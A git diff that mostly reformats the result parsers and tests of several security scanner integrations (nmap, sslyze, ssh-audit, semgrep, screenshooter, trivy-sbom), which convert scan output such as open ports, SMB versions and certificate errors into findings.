const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/unresolvable-host.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/nmap/parser/parser.js b/scanners/nmap/parser/parser.js index b34cb1f2fc..38f388adc5 100644 --- a/scanners/nmap/parser/parser.js +++ b/scanners/nmap/parser/parser.js @@ -2,8 +2,8 @@ // // SPDX-License-Identifier: Apache-2.0 -import { parseString } from 'xml2js'; -import { get, merge } from 'lodash-es'; +import { parseString } from "xml2js"; +import { get, merge } from "lodash-es"; export async function parse(fileContent) { const hosts = await parseResultFile(fileContent); @@ -11,22 +11,23 @@ export async function parse(fileContent) { } function transformToFindings(hosts) { - const scriptFindings = transformNMAPScripts(hosts); const portFindings = hosts.flatMap(({ openPorts = [], ...hostInfo }) => { - if(openPorts === null){ + if (openPorts === null) { return []; } - return openPorts.map(openPort => { + return openPorts.map((openPort) => { return { - name: openPort.service ? `Open Port: ${openPort.port} (${openPort.service})`: `Open Port: ${openPort.port}`, + name: openPort.service + ? `Open Port: ${openPort.port} (${openPort.service})` + : `Open Port: ${openPort.port}`, description: `Port ${openPort.port} is ${openPort.state} using ${openPort.protocol} protocol.`, - category: 'Open Port', + category: "Open Port", location: `${openPort.protocol}://${getHostOrIp(hostInfo)}:${openPort.port}`, - osi_layer: 'NETWORK', - severity: 'INFORMATIONAL', + osi_layer: "NETWORK", + severity: "INFORMATIONAL", attributes: { port: openPort.port, state: openPort.state, @@ -48,12 +49,12 @@ function transformToFindings(hosts) { const hostFindings = hosts.map(({ hostname, ips, osNmap }) => { return { - name: `Host: ${getHostOrIp({ hostname, ips})}`, - category: 'Host', - description: 'Found a host', + name: `Host: ${getHostOrIp({ hostname, ips })}`, + category: "Host", + description: "Found a host", location: hostname, - severity: 'INFORMATIONAL', - osi_layer: 'NETWORK', + severity: "INFORMATIONAL", + osi_layer: "NETWORK", attributes: { ip_addresses: ips, hostname: hostname, @@ -78,10 +79,9 @@ function getHostOrIp(hostInfo) { function transformNMAPScripts(hosts) { let scriptFindings = []; - for(const host of hosts) { - - if(host.scripts) { - for(const script of host.scripts) { + for (const host of hosts) { + if (host.scripts) { + for (const script of host.scripts) { // Parse Script Results const parseFunction = scriptParser[script.$.id]; if (parseFunction) { @@ -96,137 +96,147 @@ function transformNMAPScripts(hosts) { const scriptParser = { "ftp-anon": parseFtpAnon, - "banner": parseBanner, + banner: parseBanner, "smb-protocols": parseSmbProtocols, -} +}; function parseFtpAnon(host, script) { - return [merge( - { - name: "Anonymous FTP Login possible", - description: `Port ${host.openPorts[0].port} allows anonymous FTP login`, - severity: 'MEDIUM', - }, - parseFtpCommon(host, script) - )] + return [ + merge( + { + name: "Anonymous FTP Login possible", + description: `Port ${host.openPorts[0].port} allows anonymous FTP login`, + severity: "MEDIUM", + }, + parseFtpCommon(host, script), + ), + ]; } function parseBanner(host, script) { - return [merge( - { - name: "Server banner found", - description: `Port ${host.openPorts[0].port} displays banner`, - severity: 'INFORMATIONAL', - attributes: { - banner: script.$.output || null, + return [ + merge( + { + name: "Server banner found", + description: `Port ${host.openPorts[0].port} displays banner`, + severity: "INFORMATIONAL", + attributes: { + banner: script.$.output || null, + }, }, - }, - host.openPorts[0].port === 21 ? parseFtpCommon(host, script) : parseCommon(host,script) - )] + host.openPorts[0].port === 21 + ? parseFtpCommon(host, script) + : parseCommon(host, script), + ), + ]; } function parseFtpCommon(host, script) { return { - category: 'FTP', + category: "FTP", location: `ftp://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', + osi_layer: "NETWORK", attributes: { script: script.$.id || null, }, - } + }; } function parseCommon(host, script) { return { - category: 'TCP', + category: "TCP", location: `tcp://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', + osi_layer: "NETWORK", attributes: { script: script.$.id || null, }, - } + }; } function parseSmbProtocols(host, script) { // Parse SMB Script Results - console.log ("Found SMB Script Result: " + script.$.output); + console.log("Found SMB Script Result: " + script.$.output); //console.log (script); var scriptFindings = []; - if(script.table && script.table[0] && script.table[0].elem) { - - for(const elem of script.table[0].elem) { - console.log ("Found SMB SMB Protocol: " + elem); + if (script.table && script.table[0] && script.table[0].elem) { + for (const elem of script.table[0].elem) { + console.log("Found SMB SMB Protocol: " + elem); //console.log (elem); - const smbVersion = elem.toString().includes("SMBv1") ? 1 : parseFloat(elem); + const smbVersion = elem.toString().includes("SMBv1") + ? 1 + : parseFloat(elem); const attributes = { - hostname: host.hostname, - mac_address: host.mac || null, - ip_addresses: host.ips, - port: host.openPorts[0].port, - state: host.openPorts[0].state, - protocol: host.openPorts[0].protocol, - method: host.openPorts[0].method, - operating_system: host.osNmap || null, - service: host.openPorts[0].service, - serviceProduct: host.openPorts[0].serviceProduct || null, - serviceVersion: host.openPorts[0].serviceVersion || null, - scripts: elem || null, - smb_protocol_version: smbVersion, - } + hostname: host.hostname, + mac_address: host.mac || null, + ip_addresses: host.ips, + port: host.openPorts[0].port, + state: host.openPorts[0].state, + protocol: host.openPorts[0].protocol, + method: host.openPorts[0].method, + operating_system: host.osNmap || null, + service: host.openPorts[0].service, + serviceProduct: host.openPorts[0].serviceProduct || null, + serviceVersion: host.openPorts[0].serviceVersion || null, + scripts: elem || null, + smb_protocol_version: smbVersion, + }; - if(elem.toString().includes("SMBv1")) { + if (elem.toString().includes("SMBv1")) { scriptFindings.push({ name: "SMB Dangerous Protocol Version Finding SMBv1", description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: SMBv1`, - category: 'SMB', + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'HIGH', - attributes: attributes + osi_layer: "NETWORK", + severity: "HIGH", + attributes: attributes, }); - } - else if(!isNaN(smbVersion)) { - if(smbVersion > 0 && smbVersion < 2) { + } else if (!isNaN(smbVersion)) { + if (smbVersion > 0 && smbVersion < 2) { scriptFindings.push({ - name: "SMB Dangerous Protocol Version Finding v"+smbVersion, - description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: ` + smbVersion, - category: 'SMB', + name: "SMB Dangerous Protocol Version Finding v" + smbVersion, + description: + `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: ` + + smbVersion, + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'MEDIUM', - attributes: attributes + osi_layer: "NETWORK", + severity: "MEDIUM", + attributes: attributes, }); - } - else if(smbVersion >= 2 && smbVersion < 3) { + } else if (smbVersion >= 2 && smbVersion < 3) { scriptFindings.push({ - name: "SMB Protocol Version Finding v"+smbVersion, - description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: `+ smbVersion, - category: 'SMB', + name: "SMB Protocol Version Finding v" + smbVersion, + description: + `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with an old version: ` + + smbVersion, + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'LOW', - attributes: attributes + osi_layer: "NETWORK", + severity: "LOW", + attributes: attributes, }); - } - else if(smbVersion >= 3) { + } else if (smbVersion >= 3) { scriptFindings.push({ - name: "SMB Protocol Version Finding v"+smbVersion, - description: `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with version: ` + smbVersion, - category: 'SMB', + name: "SMB Protocol Version Finding v" + smbVersion, + description: + `Port ${host.openPorts[0].port} is ${host.openPorts[0].state} using SMB protocol with version: ` + + smbVersion, + category: "SMB", location: `${host.openPorts[0].protocol}://${getHostOrIp(host)}:${host.openPorts[0].port}`, - osi_layer: 'NETWORK', - severity: 'INFORMATIONAL', - attributes: attributes + osi_layer: "NETWORK", + severity: "INFORMATIONAL", + attributes: attributes, }); } } } } - return scriptFindings + return scriptFindings; } /** @@ -239,13 +249,13 @@ function parseSmbProtocols(host, script) { * osNmap: null, * scripts: null * } - * @param {*} fileContent + * @param {*} fileContent */ function parseResultFile(fileContent) { return new Promise((resolve, reject) => { parseString(fileContent, (err, xmlInput) => { if (err) { - reject(new Error('Error converting XML to JSON in xml2js: ' + err)); + reject(new Error("Error converting XML to JSON in xml2js: " + err)); } else { let tempHostList = []; if (!xmlInput.nmaprun.host) { @@ -255,115 +265,129 @@ function parseResultFile(fileContent) { xmlInput = xmlInput.nmaprun.host; - tempHostList = xmlInput.map(host => { - const newHost = { - hostname: null, - ip: null, - mac: null, - openPorts: null, - osNmap: null, - scripts: null - }; - - if (host.status && host.status?.[0]?.$?.state === 'down') { - return null; - } - - // Get hostname - if ( - host.hostnames && - host.hostnames[0] !== '\r\n' && - host.hostnames[0] !== '\n' - ) { - newHost.hostname = host.hostnames[0].hostname[0].$.name; - } - - const cleanAddresses = host.address.map(address => { - return { - type: address.$.addrtype, - address: address.$.addr, - vendor: address.$.vendor + tempHostList = xmlInput + .map((host) => { + const newHost = { + hostname: null, + ip: null, + mac: null, + openPorts: null, + osNmap: null, + scripts: null, }; - }); - newHost.mac = cleanAddresses.find((address) => address.type === "mac")?.address; - - newHost.ips = cleanAddresses - .filter((address) => address.type.startsWith("ip")) - .map((address) => address.address); + if (host.status && host.status?.[0]?.$?.state === "down") { + return null; + } - // Get ports - if (host.ports && host.ports[0].port) { - const portList = host.ports[0].port; + // Get hostname + if ( + host.hostnames && + host.hostnames[0] !== "\r\n" && + host.hostnames[0] !== "\n" + ) { + newHost.hostname = host.hostnames[0].hostname[0].$.name; + } - const openPorts = portList.filter(port => { - return port.state[0].$.state !== 'closed'; + const cleanAddresses = host.address.map((address) => { + return { + type: address.$.addrtype, + address: address.$.addr, + vendor: address.$.vendor, + }; }); - newHost.openPorts = openPorts.map(portItem => { - // console.log(JSON.stringify(portItem, null, 4)) - - const port = parseInt(portItem.$.portid, 10); - const protocol = portItem.$.protocol; - const service = get(portItem, ["service",0,"$","name"]); - const serviceProduct = get(portItem, ["service",0,"$","product"]); - const serviceVersion = get(portItem, ["service",0,"$","version"]); - - const tunnel = get(portItem, ["service",0,"$","tunnel"]); - const method = get(portItem, ["service",0,"$","method"]); - const product = get(portItem, ["service",0,"$","tunnel"]); - - const state = portItem.state[0].$.state; - - let scriptOutputs = null; - - if (portItem.script) { - scriptOutputs = portItem.script.reduce( - (carry, { $: scriptRes }) => { - carry[scriptRes.id] = scriptRes.output; - return carry; - }, - {} - ); - } - - let portObject = {}; - if (port) portObject.port = port; - if (protocol) portObject.protocol = protocol; - if (service) portObject.service = service; - if (serviceProduct) portObject.serviceProduct = serviceProduct; - if (serviceVersion) portObject.serviceVersion = serviceVersion; - - if (tunnel) portObject.tunnel = tunnel; - if (method) portObject.method = method; - if (product) portObject.product = product; - - if (state) portObject.state = state; - - if (scriptOutputs) portObject.scriptOutputs = scriptOutputs; + newHost.mac = cleanAddresses.find( + (address) => address.type === "mac", + )?.address; + + newHost.ips = cleanAddresses + .filter((address) => address.type.startsWith("ip")) + .map((address) => address.address); + + // Get ports + if (host.ports && host.ports[0].port) { + const portList = host.ports[0].port; + + const openPorts = portList.filter((port) => { + return port.state[0].$.state !== "closed"; + }); + + newHost.openPorts = openPorts.map((portItem) => { + // console.log(JSON.stringify(portItem, null, 4)) + + const port = parseInt(portItem.$.portid, 10); + const protocol = portItem.$.protocol; + const service = get(portItem, ["service", 0, "$", "name"]); + const serviceProduct = get(portItem, [ + "service", + 0, + "$", + "product", + ]); + const serviceVersion = get(portItem, [ + "service", + 0, + "$", + "version", + ]); + + const tunnel = get(portItem, ["service", 0, "$", "tunnel"]); + const method = get(portItem, ["service", 0, "$", "method"]); + const product = get(portItem, ["service", 0, "$", "tunnel"]); + + const state = portItem.state[0].$.state; + + let scriptOutputs = null; + + if (portItem.script) { + scriptOutputs = portItem.script.reduce( + (carry, { $: scriptRes }) => { + carry[scriptRes.id] = scriptRes.output; + return carry; + }, + {}, + ); + } + + let portObject = {}; + if (port) portObject.port = port; + if (protocol) portObject.protocol = protocol; + if (service) portObject.service = service; + if (serviceProduct) portObject.serviceProduct = serviceProduct; + if (serviceVersion) portObject.serviceVersion = serviceVersion; + + if (tunnel) portObject.tunnel = tunnel; + if (method) portObject.method = method; + if (product) portObject.product = product; + + if (state) portObject.state = state; + + if (scriptOutputs) portObject.scriptOutputs = scriptOutputs; + + return portObject; + }); + } - return portObject; - }); - } - - // Get Script Content - if(host.hostscript && host.hostscript[0].script) { - newHost.scripts = host.hostscript[0].script - } - // Get Script Content in case the script is of the port-rule type, - // and thus has the script under 'port' instead of 'hostscript'. - else if(host.ports && host.ports[0].port){ - for (let i=0; i < host.ports[0].port.length; i++){ - if ((host.ports[0].port)[i].script) { - newHost.scripts = host.ports[0].port[i].script + // Get Script Content + if (host.hostscript && host.hostscript[0].script) { + newHost.scripts = host.hostscript[0].script; + } + // Get Script Content in case the script is of the port-rule type, + // and thus has the script under 'port' instead of 'hostscript'. + else if (host.ports && host.ports[0].port) { + for (let i = 0; i < host.ports[0].port.length; i++) { + if (host.ports[0].port[i].script) { + newHost.scripts = host.ports[0].port[i].script; + } } } - } - if (host.os && host.os[0].osmatch && host.os[0].osmatch[0].$.name) { - newHost.osNmap = host.os[0].osmatch[0].$.name; - } - return newHost; - }).filter(Boolean); + if (host.os && host.os[0].osmatch && host.os[0].osmatch[0].$.name) { + newHost.osNmap = host.os[0].osmatch[0].$.name; + } + return newHost; + }) + .filter(Boolean); resolve(tempHostList); } diff --git a/scanners/screenshooter/integration-tests/screenshooter.test.js b/scanners/screenshooter/integration-tests/screenshooter.test.js index 7110fde2bf..8dca93dff3 100644 --- a/scanners/screenshooter/integration-tests/screenshooter.test.js +++ b/scanners/screenshooter/integration-tests/screenshooter.test.js @@ -11,10 +11,11 @@ test( "demo-target-screenshot", "screenshooter", ["http://nginx.demo-targets.svc"], - 60 * 4 + 60 * 4, ); - expect(categories).toEqual({"Screenshot":1}); - }, 60*1000 + expect(categories).toEqual({ Screenshot: 1 }); + }, + 60 * 1000, ); -2 \ No newline at end of file +2; diff --git a/scanners/screenshooter/parser/parser.js b/scanners/screenshooter/parser/parser.js index 4b3c3f3856..9b82ae8881 100644 --- a/scanners/screenshooter/parser/parser.js +++ b/scanners/screenshooter/parser/parser.js @@ -3,9 +3,8 @@ // SPDX-License-Identifier: Apache-2.0 async function parse(image, scan) { - if (image.length === 0) { - return [] + return []; } const websiteUrl = scan.spec.parameters[0]; diff --git a/scanners/screenshooter/parser/parser.test.js b/scanners/screenshooter/parser/parser.test.js index 85a13aa533..eceb2be2b6 100644 --- a/scanners/screenshooter/parser/parser.test.js +++ b/scanners/screenshooter/parser/parser.test.js @@ -47,7 +47,7 @@ test("should create finding correctly", async () => { test("should not create finding if image is empty", async () => { scan.spec.parameters = ["https://www.iteratec.de"]; - const findings = await parse("", scan) + const findings = await parse("", scan); await expect(validateParser(findings)).resolves.toBeUndefined(); expect(findings).toMatchInlineSnapshot(`[]`); }); diff --git a/scanners/semgrep/integration-tests/semgrep.test.js b/scanners/semgrep/integration-tests/semgrep.test.js index 14c8d47d49..2855aafb39 100644 --- a/scanners/semgrep/integration-tests/semgrep.test.js +++ b/scanners/semgrep/integration-tests/semgrep.test.js @@ -36,13 +36,13 @@ test( expect(count).toBe(3); expect(categories).toEqual({ - "security": 3, + security: 3, }); expect(severities).toEqual({ high: 3, }); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); /* Disable this rule as it requires access to the Internet and clones a public GitHub repo diff --git a/scanners/semgrep/parser/parser.test.js b/scanners/semgrep/parser/parser.test.js index 01a38dbdb9..7fa79166ba 100644 --- a/scanners/semgrep/parser/parser.test.js +++ b/scanners/semgrep/parser/parser.test.js @@ -14,7 +14,7 @@ test("should properly parse file from inline semgrep usage", async () => { __dirname + "/__testFiles__/minimal-metadata.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent)); // validate findings @@ -43,7 +43,7 @@ test("should properly parse file with a single result", async () => { __dirname + "/__testFiles__/python-injection.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent)); // validate findings @@ -85,7 +85,7 @@ test("should properly parse file with multiple results", async () => { __dirname + "/__testFiles__/python-injection-multiresult.json", { encoding: "utf8", - } + }, ); const findings = await parse(JSON.parse(jsonContent)); // validate findings diff --git a/scanners/ssh-audit/integration-tests/ssh-audit.test.js b/scanners/ssh-audit/integration-tests/ssh-audit.test.js index 38c2238e74..a938d987e1 100644 --- a/scanners/ssh-audit/integration-tests/ssh-audit.test.js +++ b/scanners/ssh-audit/integration-tests/ssh-audit.test.js @@ -13,7 +13,7 @@ test( "ssh-audit-dummy-ssh", "ssh-audit", ["dummy-ssh.demo-targets.svc"], - 90 + 90, ); expect(count).toBe(7); expect(categories).toMatchInlineSnapshot(` @@ -30,7 +30,7 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test( @@ -41,11 +41,11 @@ test( "ssh-audit-non-existing", "ssh-audit", ["this-target-doesnt-exist.demo-targets.svc"], - 180 - ) + 180, + ), ).rejects.toThrow( - 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"' + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', ); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/ssh-audit/parser/parser.js b/scanners/ssh-audit/parser/parser.js index c9b1119f98..7b1f8c87c1 100644 --- a/scanners/ssh-audit/parser/parser.js +++ b/scanners/ssh-audit/parser/parser.js @@ -175,7 +175,7 @@ const templates = { function transformRecommendationToFinding( recommendationSeverityLevel, value, - destination + destination, ) { // SSH audit has critical and warnings as recommendations. // These are HIGH and MEDIUM severities, respectively @@ -189,7 +189,7 @@ function transformRecommendationToFinding( //algorithmType = kex/ key/ mac, , algorithmNames = {name+note} Object.entries(algorithms).map(([algorithmType, algorithmData]) => { const algorithmNames = Object.entries(algorithmData).map( - ([keyNames, content]) => Object.values(content) + ([keyNames, content]) => Object.values(content), ); const findingTemplate = @@ -204,7 +204,7 @@ function transformRecommendationToFinding( findingTemplate["attributes"] = {}; findingTemplate["attributes"]["algorithms"] = algorithmNames.flatMap( ([algName, note]) => - note == "" ? algName : `${algName} (Note: ${note})` + note == "" ? algName : `${algName} (Note: ${note})`, ); policyViolationFindings.push(findingTemplate); @@ -215,7 +215,6 @@ function transformRecommendationToFinding( return policyViolationFindings; } - function isIPaddress(target) { if (/^(?!0)(?!.*\.$)((1?\d?\d|25[0-5]|2[0-4]\d)(\.|$)){4}$/.test(target)) return true; @@ -244,8 +243,8 @@ async function parse(fileContent) { transformRecommendationToFinding( recommendationSeverityLevel, value, - location - ) + location, + ), ); // informational findings diff --git a/scanners/ssh-audit/parser/parser.test.js b/scanners/ssh-audit/parser/parser.test.js index 3f30c70fec..f00b9debe1 100644 --- a/scanners/ssh-audit/parser/parser.test.js +++ b/scanners/ssh-audit/parser/parser.test.js @@ -16,7 +16,7 @@ test("ssh-audit parser parses a result into proper findings for dummy-ssh", asyn const hosts = JSON.parse( await readFile(__dirname + "/__testFiles__/dummy-ssh.json", { encoding: "utf8", - }) + }), ); const findings = await parse(hosts); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -464,7 +464,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); @@ -475,7 +475,7 @@ test("ssh-audit parser parses a result into proper findings for an example with const hosts = JSON.parse( await readFile(__dirname + "/__testFiles__/portExample.json", { encoding: "utf8", - }) + }), ); const findings = await parse(hosts); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/sslyze/integration-tests/sslyze.test.js b/scanners/sslyze/integration-tests/sslyze.test.js index 8e23ecd937..90ad55f2eb 100644 --- a/scanners/sslyze/integration-tests/sslyze.test.js +++ b/scanners/sslyze/integration-tests/sslyze.test.js @@ -9,11 +9,11 @@ jest.retryTimes(3); test( "Sslyze scans the self-signed unsafe-https demo-target", async () => { - const {categories, severities, count} = await scan( + const { categories, severities, count } = await scan( "sslyze-unsafe-https", "sslyze", ["--mozilla_config=intermediate", "unsafe-https.demo-targets.svc"], - 90 + 90, ); expect(count).toBe(4); @@ -31,15 +31,15 @@ test( } `); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test( "Invalid argument should be marked as errored", async () => { await expect( - scan("sslyze-invalidArg", "sslyze", ["--invalidArg", "example.com"], 90) + scan("sslyze-invalidArg", "sslyze", ["--invalidArg", "example.com"], 90), ).rejects.toThrow("HTTP request failed"); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); diff --git a/scanners/sslyze/parser/parser.js b/scanners/sslyze/parser/parser.js index 0fe6237cf2..04ce33e882 100644 --- a/scanners/sslyze/parser/parser.js +++ b/scanners/sslyze/parser/parser.js @@ -4,15 +4,18 @@ function parse(fileContent) { // Only 0 when the target wasn't reachable - if (!fileContent.server_scan_results || fileContent.server_scan_results.length === 0) { + if ( + !fileContent.server_scan_results || + fileContent.server_scan_results.length === 0 + ) { return []; } const serverScanResult = fileContent.server_scan_results[0]; - - if (serverScanResult.connectivity_status == "ERROR"){ + + if (serverScanResult.connectivity_status == "ERROR") { console.error( - "Cannot parse the result file, as some of the scan parts failed." + "Cannot parse the result file, as some of the scan parts failed.", ); return []; } @@ -21,9 +24,11 @@ function parse(fileContent) { console.log("Parsing Result File"); console.log(JSON.stringify(fileContent)); } - + if (fileContent.date_scans_completed) { - serverScanResult.identified_at = new Date(fileContent.date_scans_completed).toISOString(); + serverScanResult.identified_at = new Date( + fileContent.date_scans_completed, + ).toISOString(); } const partialFindings = [ @@ -146,10 +151,14 @@ function generateVulnerableTLSVersionFindings(serverScanResult) { } function analyseCertificateDeployments(serverScanResult) { - if (serverScanResult?.scan_result?.certificate_info?.result?.certificate_deployments) { - const certificateInfos = serverScanResult.scan_result.certificate_info.result.certificate_deployments.map( - analyseCertificateDeployment - ); + if ( + serverScanResult?.scan_result?.certificate_info?.result + ?.certificate_deployments + ) { + const certificateInfos = + serverScanResult.scan_result.certificate_info.result.certificate_deployments.map( + analyseCertificateDeployment, + ); // If at least one cert is totally trusted no finding should be created if (certificateInfos.every((certInfo) => certInfo.trusted)) { return []; @@ -197,16 +206,19 @@ function analyseCertificateDeployments(serverScanResult) { }); } else { // No certificate info found - return [{ - name: "ASN.1 Parsing Error", - category: "Invalid Certificate", - description: "An error occurred while parsing the ASN.1 value in the certificate. This may be due to a corrupted certificate, improper formatting, or incompatibility with the cryptography library.", - identified_at: serverScanResult.identified_at, - severity: "MEDIUM", - mitigation: "Verify the integrity of the certificate, or inspect the certificate for custom or non-standard extensions.", - attributes: {}, - } - ]; + return [ + { + name: "ASN.1 Parsing Error", + category: "Invalid Certificate", + description: + "An error occurred while parsing the ASN.1 value in the certificate. This may be due to a corrupted certificate, improper formatting, or incompatibility with the cryptography library.", + identified_at: serverScanResult.identified_at, + severity: "MEDIUM", + mitigation: + "Verify the integrity of the certificate, or inspect the certificate for custom or non-standard extensions.", + attributes: {}, + }, + ]; } } @@ -225,21 +237,25 @@ function analyseCertificateDeployment(certificateDeployment) { const leafCertificate = certificateDeployment.received_certificate_chain[0]; // Check if the certificate is self-signed by comparing subject and issuer - const isSelfSigned = leafCertificate.subject.rfc4514_string === leafCertificate.issuer.rfc4514_string; + const isSelfSigned = + leafCertificate.subject.rfc4514_string === + leafCertificate.issuer.rfc4514_string; // Determine if the certificate is missing required extension const hasMissingRequiredExtension = errorsAcrossAllTruststores.has( - "validation failed: Other(\"Certificate is missing required extension\")" + 'validation failed: Other("Certificate is missing required extension")', ); return { // To be trusted no openssl errors should have occurred and should match hostname trusted: errorsAcrossAllTruststores.size === 0, matchesHostname: !errorsAcrossAllTruststores.has( - "validation failed: Other(\"leaf certificate has no matching subjectAltName\")" + 'validation failed: Other("leaf certificate has no matching subjectAltName")', ), selfSigned: isSelfSigned, - expired: errorsAcrossAllTruststores.has("validation failed: Other(\"cert is not valid at validation time\")"), + expired: errorsAcrossAllTruststores.has( + 'validation failed: Other("cert is not valid at validation time")', + ), untrustedRoot: hasMissingRequiredExtension && !isSelfSigned, }; } diff --git a/scanners/sslyze/parser/parser.test.js b/scanners/sslyze/parser/parser.test.js index 90a662084e..96adc39fbf 100644 --- a/scanners/sslyze/parser/parser.test.js +++ b/scanners/sslyze/parser/parser.test.js @@ -7,13 +7,13 @@ const { validateParser, } = require("@securecodebox/parser-sdk-nodejs/parser-utils"); -const {parse} = require("./parser"); +const { parse } = require("./parser"); test("parses result file for www.securecodebox.io correctly", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/www.securecodebox.io.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); @@ -60,7 +60,7 @@ test("parses result file for tls-v1-0.badssl.com:1010 correctly", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/tls-v1-0.badssl.com_1010.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); @@ -165,7 +165,7 @@ test("parses result file for expired.badssl.com correctly", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/expired.badssl.com.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); @@ -287,7 +287,7 @@ test("parses result file for wrong.host.badssl.com correctly", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/wrong.host.badssl.com.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); @@ -410,8 +410,8 @@ test("parses result file for untrusted-root.badssl.com correctly", async () => { __dirname + "/__testFiles__/untrusted-root.badssl.com.json", { encoding: "utf8", - } - ) + }, + ), ); const findings = await parse(fileContent); @@ -532,7 +532,7 @@ test("parses result file for self-signed.badssl.com correctly", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/self-signed.badssl.com.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); @@ -655,8 +655,8 @@ test("parses result file for target without certificate_deployments correctly", __dirname + "/__testFiles__/no-certificate_deployments.json", { encoding: "utf8", - } - ) + }, + ), ); const findings = await parse(fileContent); @@ -726,7 +726,7 @@ test("parses an empty result file correctly", async () => { const fileContent = JSON.parse( await readFile(__dirname + "/__testFiles__/unavailable-host.json", { encoding: "utf8", - }) + }), ); const findings = await parse(fileContent); @@ -739,7 +739,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); diff --git a/scanners/test-scan/parser/parser.js b/scanners/test-scan/parser/parser.js index 483dc1c012..022813e19a 100644 --- a/scanners/test-scan/parser/parser.js +++ b/scanners/test-scan/parser/parser.js @@ -4,12 +4,11 @@ async function parse() { if (process.env["PRODUCE_INVALID_FINDINGS"] === "true") - return getInvalidFindings() - else - return getValidFindings() + return getInvalidFindings(); + else return getValidFindings(); } -function getInvalidFindings(){ +function getInvalidFindings() { return [ { //missing name and category to be a valid finding @@ -22,46 +21,47 @@ function getInvalidFindings(){ hostname: "hostname", operating_system: "osNmap", }, - } - ] + }, + ]; } -function getValidFindings(){ - return [{ - name: "Test read-write-hook service", - description: `Port is using protocol.`, - category: "Open Port", - location: `tcp://rw-hook-test:80`, - osi_layer: "NETWORK", - severity: "INFORMATIONAL", - attributes: { - port: 80, - state: "Open", - ip_addresses: ["10.0.0.1"], - mac_address: "hostInfo.mac", - protocol: "openPort.protocol", - hostname: "hostInfo.hostname", - method: "openPort.method", - operating_system: "hostInfo.osNmap", - service: "openPort.service", - serviceProduct: "openPort.serviceProduct", - serviceVersion: "openPort.serviceVersion", - scripts: "openPort.scriptOutputs", +function getValidFindings() { + return [ + { + name: "Test read-write-hook service", + description: `Port is using protocol.`, + category: "Open Port", + location: `tcp://rw-hook-test:80`, + osi_layer: "NETWORK", + severity: "INFORMATIONAL", + attributes: { + port: 80, + state: "Open", + ip_addresses: ["10.0.0.1"], + mac_address: "hostInfo.mac", + protocol: "openPort.protocol", + hostname: "hostInfo.hostname", + method: "openPort.method", + operating_system: "hostInfo.osNmap", + service: "openPort.service", + serviceProduct: "openPort.serviceProduct", + serviceVersion: "openPort.serviceVersion", + scripts: "openPort.scriptOutputs", + }, }, - }, - { - name: `Host: hostname`, - category: "Host", - description: "Found a host", - location: "hostname", - severity: "INFORMATIONAL", - osi_layer: "NETWORK", - attributes: { - ip_addresses: ["10.0.0.1"], - hostname: "hostname", - operating_system: "osNmap", + { + name: `Host: hostname`, + category: "Host", + description: "Found a host", + location: "hostname", + severity: "INFORMATIONAL", + osi_layer: "NETWORK", + attributes: { + ip_addresses: ["10.0.0.1"], + hostname: "hostname", + operating_system: "osNmap", + }, }, - }, ]; } diff --git a/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js b/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js index a8cd3a7deb..935e462032 100644 --- a/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js +++ b/scanners/trivy-sbom/integration-tests/trivy-sbom.test.js @@ -13,14 +13,14 @@ test( "trivy-juice-test", "trivy-sbom-image", ["bkimminich/juice-shop:v15.0.0"], - 90 + 90, ); expect(count).toEqual(1); expect(categories["SBOM"]).toEqual(1); expect(severities["informational"]).toEqual(1); }, - 3 * 60 * 1000 + 3 * 60 * 1000, ); test( @@ -31,9 +31,9 @@ test( "trivy-invalidArg", "trivy-sbom-image", ["--invalidArg", "not/a-valid-image:v0.0.0"], - 90 - ) + 